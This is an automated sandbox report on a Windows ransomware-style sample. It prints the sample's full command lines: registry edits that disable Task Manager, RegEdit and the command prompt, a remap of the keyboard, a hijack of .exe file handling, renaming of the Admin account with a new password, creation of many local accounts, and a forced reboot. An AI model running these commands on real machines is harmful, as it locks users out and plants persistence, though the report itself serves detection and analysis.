Malware Analysis Report

2024-10-24 18:18

Sample ID 241018-c1w8va1hlh
Target b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe
SHA256 b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f
Tags
evasion persistence privilege_escalation ransomware
score
8/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
8/10

SHA256

b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f

Threat Level: Likely malicious

The file b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe was found to be: Likely malicious.

Malicious Activity Summary

evasion persistence privilege_escalation ransomware

Event Triggered Execution: Image File Execution Options Injection

Disables RegEdit via registry modification

Disables Task Manager via registry modification

Checks computer location settings

Drops file in System32 directory

Sets desktop wallpaper using registry

Enumerates physical storage devices

Unsigned PE

Event Triggered Execution: Accessibility Features

Modifies data under HKEY_USERS

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Modifies registry class

Runs net.exe

Suspicious use of SetWindowsHookEx

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-18 02:33

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-18 02:33

Reported

2024-10-18 02:33

Platform

win7-20241010-en

Max time kernel

4s

Max time network

5s

Command Line

"C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe"

Signatures

Disables RegEdit via registry modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" C:\Windows\system32\reg.exe N/A

Disables Task Manager via registry modification

evasion

Event Triggered Execution: Image File Execution Options Injection

persistence
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe\Debugger = "NUL" C:\Windows\system32\reg.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\System32\Microsoft\Protect\Defender.Update\user-48.png C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe N/A
File created C:\Windows\System32\Microsoft\Protect\Defender.Update\aplicaciones.vbs C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe N/A
File opened for modification C:\Windows\System32\Microsoft\Protect\Defender.Update\img000.png C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe N/A
File created C:\Windows\System32\Microsoft\Protect\Defender.Update\user.png C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe N/A
File created C:\Windows\System32\Microsoft\Protect\Defender.Update\user-40.png C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe N/A
File opened for modification C:\Windows\System32\Microsoft\Protect\Defender.Update\user-40.png C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe N/A
File opened for modification C:\Windows\System32\Microsoft\Protect\Defender.Update C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe N/A
File opened for modification C:\Windows\System32\Microsoft\Protect\Defender.Update\main.cmd C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe N/A
File opened for modification C:\Windows\System32\Microsoft\Protect\Defender.Update\user.bmp C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe N/A
File opened for modification C:\Windows\System32\Microsoft\Protect\Defender.Update\user.png C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe N/A
File opened for modification C:\Windows\System32\Microsoft\Protect\Defender.Update\guest.png C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe N/A
File opened for modification C:\Windows\System32\Microsoft\Protect\Defender.Update\user-192.png C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe N/A
File created C:\Windows\System32\Microsoft\Protect\Defender.Update\user-32.png C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe N/A
File created C:\Windows\System32\Microsoft\Protect\Defender.Update\__tmp_rar_sfx_access_check_259416886 C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe N/A
File opened for modification C:\Windows\System32\Microsoft\Protect\Defender.Update\guest.bmp C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe N/A
File created C:\Windows\System32\Microsoft\Protect\Defender.Update\guest.bmp C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe N/A
File created C:\Windows\System32\Microsoft\Protect\Defender.Update\main.cmd C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe N/A
File created C:\Windows\System32\Microsoft\Protect\Defender.Update\img000.png C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe N/A
File created C:\Windows\System32\Microsoft\Protect\Defender.Update\user.bmp C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe N/A
File opened for modification C:\Windows\System32\Microsoft\Protect\Defender.Update\aplicaciones.vbs C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe N/A
File created C:\Windows\System32\Microsoft\Protect\Defender.Update\user-192.png C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe N/A
File created C:\Windows\System32\Microsoft\Protect\Defender.Update\YA.NO.LO.PUEDES.RECUPERAR.txt C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe N/A
File opened for modification C:\Windows\System32\Microsoft\Protect\Defender.Update\main.vbs C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe N/A
File opened for modification C:\Windows\System32\Microsoft\Protect\Defender.Update\user-32.png C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe N/A
File opened for modification C:\Windows\System32\Microsoft\Protect\Defender.Update\YA.NO.LO.PUEDES.RECUPERAR.txt C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe N/A
File created C:\Windows\System32\Microsoft\Protect\Defender.Update\guest.png C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe N/A
File created C:\Windows\System32\Microsoft\Protect\Defender.Update\main.vbs C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe N/A
File opened for modification C:\Windows\System32\Microsoft\Protect\Defender.Update\user-48.png C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Control Panel\Desktop\Wallpaper = "C:\\Windows\\System32\\Microsoft\\Protect\\Defender.Update\\img000.png" C:\Windows\system32\reg.exe N/A

Enumerates physical storage devices

Event Triggered Execution: Accessibility Features

persistence privilege_escalation

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\VBSExeHandler C:\Windows\System32\cmd.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\VBSExeHandler\Shell C:\Windows\System32\cmd.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\VBSExeHandler\Shell\Open C:\Windows\System32\cmd.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\VBSExeHandler\Shell\Open\Command C:\Windows\System32\cmd.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\VBSExeHandler\Shell\Open\Command\ = "wscript.exe \"C:\\Windows\\System32\\Microsoft\\Protect\\Defender.Update\\aplicaciones.vbs\" \"\" " C:\Windows\System32\cmd.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.exe C:\Windows\System32\cmd.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.exe\ = "VBSExeHandler" C:\Windows\System32\cmd.exe N/A

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\shutdown.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\system32\shutdown.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2828 wrote to memory of 2740 N/A C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe C:\Windows\System32\WScript.exe
PID 2828 wrote to memory of 2740 N/A C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe C:\Windows\System32\WScript.exe
PID 2828 wrote to memory of 2740 N/A C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe C:\Windows\System32\WScript.exe
PID 2740 wrote to memory of 2304 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 2740 wrote to memory of 2304 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 2740 wrote to memory of 2304 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 2304 wrote to memory of 1948 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2304 wrote to memory of 1948 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2304 wrote to memory of 1948 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2304 wrote to memory of 536 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2304 wrote to memory of 536 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2304 wrote to memory of 536 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2304 wrote to memory of 484 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2304 wrote to memory of 484 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2304 wrote to memory of 484 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2304 wrote to memory of 1152 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2304 wrote to memory of 1152 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2304 wrote to memory of 1152 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2304 wrote to memory of 1012 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2304 wrote to memory of 1012 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2304 wrote to memory of 1012 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2304 wrote to memory of 632 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2304 wrote to memory of 632 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2304 wrote to memory of 632 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2304 wrote to memory of 2908 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2304 wrote to memory of 2908 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2304 wrote to memory of 2908 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2304 wrote to memory of 3016 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\rundll32.exe
PID 2304 wrote to memory of 3016 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\rundll32.exe
PID 2304 wrote to memory of 3016 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\rundll32.exe
PID 2304 wrote to memory of 580 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2304 wrote to memory of 580 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2304 wrote to memory of 580 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2304 wrote to memory of 1844 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2304 wrote to memory of 1844 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2304 wrote to memory of 1844 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2304 wrote to memory of 828 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2304 wrote to memory of 828 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2304 wrote to memory of 828 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2304 wrote to memory of 2436 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2304 wrote to memory of 2436 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2304 wrote to memory of 2436 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2304 wrote to memory of 2640 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2304 wrote to memory of 2640 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2304 wrote to memory of 2640 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2304 wrote to memory of 2772 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2304 wrote to memory of 2772 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2304 wrote to memory of 2772 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2304 wrote to memory of 2624 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2304 wrote to memory of 2624 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2304 wrote to memory of 2624 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2304 wrote to memory of 1608 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 2304 wrote to memory of 1608 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 2304 wrote to memory of 1608 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 1608 wrote to memory of 3068 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1608 wrote to memory of 3068 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1608 wrote to memory of 3068 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2304 wrote to memory of 1228 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 2304 wrote to memory of 1228 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 2304 wrote to memory of 1228 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 1228 wrote to memory of 2552 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1228 wrote to memory of 2552 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1228 wrote to memory of 2552 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2304 wrote to memory of 2548 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe

Processes

C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe

"C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Windows\System32\Microsoft\Protect\Defender.Update\main.vbs"

C:\Windows\System32\cmd.exe

cmd /c ""C:\Windows\System32\Microsoft\Protect\Defender.Update\main.cmd" "

C:\Windows\system32\reg.exe

REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout" /v "Scancode Map" /t REG_BINARY /d 0000000000000071000000000000010000003b0000003c0000003d0000003e0000003f0000004000000041000000420000004300000044000000570000005800000037e000004600000052e0000047e0000049e0000051e000004fe0000053e0000048e000004be0000050e000004de00000520000005300000051000000500000004f0000004b0000004c0000004d0000004e0000004900000048000000470000004500000035e00000370000004a0000002900000002000000030000000400000005000000060000000700000008000000090000000a0000000b0000000c0000000d0000000f0000001000000011000000130000001600000017000000190000001a0000001b0000002b000000280000002700000026000000250000002400000022000000210000003a0000002a0000001d0000005be00000380000002c0000002d0000002e0000002f0000003000000032000000330000003400000035000000360000001de000005de000005ce0000038e000005900000065e0000021e000006be000005ee000005fe000006ae0000069e0000068e0000067e0000032e000006ce000006de0000066e0000020e000002ee000002ce0000030e0000019e0000010e0000024e0000022e0000000 /f

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v shutdownwithoutlogon /t REG_DWORD /d 0 /f

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\Control Panel\Mouse" /v SwapMouseButtons /t REG_SZ /d 1 /f

C:\Windows\system32\reg.exe

REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoClose /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v UseDefaultTile /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /v Debugger /t REG_SZ /d "NUL" /f

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Windows\System32\Microsoft\Protect\Defender.Update\img000.png" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v DontDisplayLastUserName /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v HideFastUserSwitching /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v DontDisplayUserName /t REG_DWORD /d 3 /f

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System" /v DisableCMD /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /f

C:\Windows\System32\Wbem\WMIC.exe

wmic useraccount where name='Admin' rename "YOU ARE THE NEXT"

C:\Windows\system32\net.exe

net user "YOU ARE THE NEXT" "im dead"

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user "YOU ARE THE NEXT" "im dead"

C:\Windows\system32\net.exe

net user T3yZrQ Maxcheto /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user T3yZrQ Maxcheto /add

C:\Windows\system32\net.exe

net user 8rJpX1 Maxcheto /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user 8rJpX1 Maxcheto /add

C:\Windows\system32\net.exe

net user 9MaL2Z Maxcheto /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user 9MaL2Z Maxcheto /add

C:\Windows\system32\net.exe

net user K4$dF27 Maxcheto /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user K4$dF27 Maxcheto /add

C:\Windows\system32\net.exe

net user xC78RT Maxcheto /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user xC78RT Maxcheto /add

C:\Windows\system32\net.exe

net user 3nL9$p2x Maxcheto /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user 3nL9$p2x Maxcheto /add

C:\Windows\system32\net.exe

net user X7hbQ5Z Maxcheto /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user X7hbQ5Z Maxcheto /add

C:\Windows\system32\net.exe

net user R2xD1B Maxcheto /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user R2xD1B Maxcheto /add

C:\Windows\system32\net.exe

net user m14T8z Maxcheto /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user m14T8z Maxcheto /add

C:\Windows\system32\net.exe

net user L27w8G Maxcheto /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user L27w8G Maxcheto /add

C:\Windows\system32\net.exe

net user P9dR2Y Maxcheto /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user P9dR2Y Maxcheto /add

C:\Windows\system32\net.exe

net user 5QL71t Maxcheto /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user 5QL71t Maxcheto /add

C:\Windows\system32\net.exe

net user r8B6V3F Maxcheto /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user r8B6V3F Maxcheto /add

C:\Windows\system32\net.exe

net user 7CXz1b Maxcheto /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user 7CXz1b Maxcheto /add

C:\Windows\system32\net.exe

net user n38vJQ Maxcheto /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user n38vJQ Maxcheto /add

C:\Windows\system32\net.exe

net user x6G7P1L Maxcheto /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user x6G7P1L Maxcheto /add

C:\Windows\system32\net.exe

net user M239Wk Maxcheto /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user M239Wk Maxcheto /add

C:\Windows\system32\net.exe

net user 7F2hY4Z Maxcheto /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user 7F2hY4Z Maxcheto /add

C:\Windows\system32\net.exe

net user 8QrB1L7 Maxcheto /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user 8QrB1L7 Maxcheto /add

C:\Windows\system32\net.exe

net user t93V6D Maxcheto /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user t93V6D Maxcheto /add

C:\Windows\system32\net.exe

net user 5tG2Q8J Maxcheto /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user 5tG2Q8J Maxcheto /add

C:\Windows\system32\net.exe

net user x9K1P7L Maxcheto /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user x9K1P7L Maxcheto /add

C:\Windows\system32\net.exe

net user z7R4M3 Maxcheto /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user z7R4M3 Maxcheto /add

C:\Windows\system32\shutdown.exe

shutdown /r /f /t 0

C:\Windows\system32\LogonUI.exe

"LogonUI.exe" /flags:0x0

C:\Windows\system32\LogonUI.exe

"LogonUI.exe" /flags:0x1

Network

N/A

Files

C:\Windows\System32\Microsoft\Protect\Defender.Update\main.vbs

MD5 7c652236d1e09a76cfc27cb2611b80ad
SHA1 f9c359054835b06308165e110cdc5229d4fda8fb
SHA256 4026d4567c422a1281580654d5592d5ce00fce125d8565b7c00ac5f7eb712e4c
SHA512 6a283c0428b91fbc39efbea2c3a793d89de1ae46451acf2c376c8b9b64c946ffa9ec9d83cc154d1647949e2cad79b2de2e3d655286d94ab52089734a92f943fe

C:\Windows\System32\Microsoft\Protect\Defender.Update\main.cmd

MD5 7835d8ae389b8b78ea4d06c024d63849
SHA1 5a0196e67a8af7185b372aacf5ad817a26546ad1
SHA256 029a47eb246a5d4aa21b9a4ccaffc5103c5d93cd8955869d62d04e4f75612fd1
SHA512 3b5c9ef7a6ec79983475b78e52b0e2c5d059cbcfd6b40832ddad067ed3fbf648507836664d489553372da6bfecc2c697b51b3ec57e5aa4d2939707bfc90c9372

C:\Windows\System32\Microsoft\Protect\Defender.Update\img000.png

MD5 44055016d847ddbd0e8f0a56ea2a0ba6
SHA1 cb4e3dfdb804aebb78c96100b42b29db28d902cd
SHA256 2fa62a6d8816d3a7f45a371449ef044851556f6d38fc5030be3f58a25ccbd7f2
